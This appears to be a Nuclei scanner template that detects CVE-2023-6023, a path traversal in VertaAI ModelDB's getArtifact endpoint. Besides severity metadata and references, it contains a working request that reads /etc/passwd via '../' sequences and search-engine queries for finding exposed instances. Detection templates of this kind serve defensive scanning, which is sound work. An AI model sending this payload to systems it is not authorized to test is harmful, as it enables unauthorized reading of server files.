id: CVE-2023-6023 info: name: VertaAI ModelDB - Path Traversal author: m0ck3d,cookiehanhoan severity: high description: | The endpoint "/api/v1/artifact/getArtifact?artifact_path=" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter. impact: | Attackers can potentially exploit this vulnerability to perform a relative path traversal attack, which can lead to unauthorized access to sensitive local files on the server. As an impact it is known to affect confidentiality. remediation: Restrict access to the web application reference: - https://huntr.com/bounties/644ab868-db6d-4685-ab35-1a897632d2ca/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6023 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-6023 cwe-id: CWE-22,CWE-29 epss-score: 0.003 epss-percentile: 0.69472 cpe: cpe:2.3:a:vertaai:modeldb:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vertaai product: modeldb shodan-query: - http.favicon.hash:-2097033750 - http.title:"verta ai" fofa-query: - icon_hash=-2097033750 - title="verta ai" google-query: intitle:"verta ai" zoomeye-query: - title:"Verta AI" - title:"verta ai" tags: cve,cve2023,lfi,modeldb,vertaai http: - method: GET path: - "{{BaseURL}}/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header words: - "application/octet-stream" - "filename=" condition: and - type: status status: - 200 # digest: 4b0a00483046022100c69b25625a73d8650d632e7e123959c5bae22681146d202eccf0312e7c2cd810022100842c2167554daecf73927e131695af94eb60b7f1f1b504206e0730cdbf4c19d7:922c64590222798bb761d5b6d8e72950